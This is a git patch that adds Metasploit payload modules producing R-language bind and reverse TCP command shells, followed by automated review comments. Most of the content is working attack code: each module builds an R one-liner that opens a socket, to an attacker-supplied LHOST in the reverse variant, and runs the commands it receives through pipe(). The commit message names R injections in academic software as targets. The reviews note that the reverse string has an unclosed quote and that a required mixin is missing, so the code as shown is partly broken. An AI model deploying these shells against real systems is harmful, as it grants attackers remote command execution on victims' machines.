From d76616e8e8c978462c277c556e19711467fdde32 Mon Sep 17 00:00:00 2001
From: RageLtMan
Date: Sat, 19 Aug 2017 05:57:45 -0400
Subject: [PATCH] Reverse and bind shells in R

Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions
---
modules/payloads/singles/r/shell_bind_tcp.rb | 43 ++++++++++++++++++
.../payloads/singles/r/shell_reverse_tcp.rb | 45 +++++++++++++++++++
2 files changed, 88 insertions(+)
create mode 100644 modules/payloads/singles/r/shell_bind_tcp.rb
create mode 100644 modules/payloads/singles/r/shell_reverse_tcp.rb
diff --git a/modules/payloads/singles/r/shell_bind_tcp.rb b/modules/payloads/singles/r/shell_bind_tcp.rb
new file mode 100644
index 0000000000..532b2dbe8a
--- /dev/null
+++ b/modules/payloads/singles/r/shell_bind_tcp.rb
@@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 516
+
+ include Msf::Payload::Single
+ include Msf::Payload::R
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'R Command Shell, Bind TCP',
+ 'Description' => 'Continually listen for a connection and spawn a command shell via R',
+ 'Author' => [ 'RageLtMan' ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'r',
+ 'Arch' => ARCH_R,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'r',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ return prepends(r_string)
+ end
+
+ def r_string
+ return "s<-socketConnection(port=#{datastore['LPORT']}," +
+ "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+ "(pipe(readLines(s,1))),s)}"
+ end
+end
diff --git a/modules/payloads/singles/r/shell_reverse_tcp.rb b/modules/payloads/singles/r/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..ca8b7c2235
--- /dev/null
+++ b/modules/payloads/singles/r/shell_reverse_tcp.rb
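Review bot: This module cannot load as submitted, because `require 'msf/core/payload/r'`, `Msf::Payload::R`, `ARCH_R` and `prepends` (presumably supplied by that mixin) are referenced while the diffstat adds only the two payload files, which matches the TODO in the description; shell_reverse_tcp.rb has the same dependency. `CachedSize = 516` is also identical in both files even though the reverse variant emits an extra `host=` argument, so the value looks copied rather than measured and should be regenerated once the mixin exists. `r_string` would benefit from a comment such as `# Each line read from the socket runs in its own pipe(); cwd and environment do not persist between commands`, since that behaviour is currently described only in the commit message.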
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 516
+
+ include Msf::Payload::Single
+ include Msf::Payload::R
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'R Command Shell, Reverse TCP',
+ 'Description' => 'Connect back and create a command shell via R',
+ 'Author' => [ 'RageLtMan' ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'r',
+ 'Arch' => ARCH_R,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'r',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ return prepends(r_string)
+ end
+
+ def r_string
+ lhost = datastore['LHOST']
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
+ "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
+ "(pipe(readLines(s, 1))),s)}"
+ end
+end
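Review bot: In `r_string` the `host` argument is never closed: `host='#{lhost},port=` leaves the R string literal open until the quote in `open='r+'`, so the generated code does not parse; the fragment should read `host='#{lhost}',port=#{datastore['LPORT']},`. `LHOST` is also interpolated into the R source without escaping, so a value containing a single quote would unbalance the literal again; validating it as an address or hostname before building the string would keep the output well-formed. Whether R's `socketConnection` accepts the bracketed `[addr]` form produced for IPv6 is not shown here and deserves a line in the testing notes.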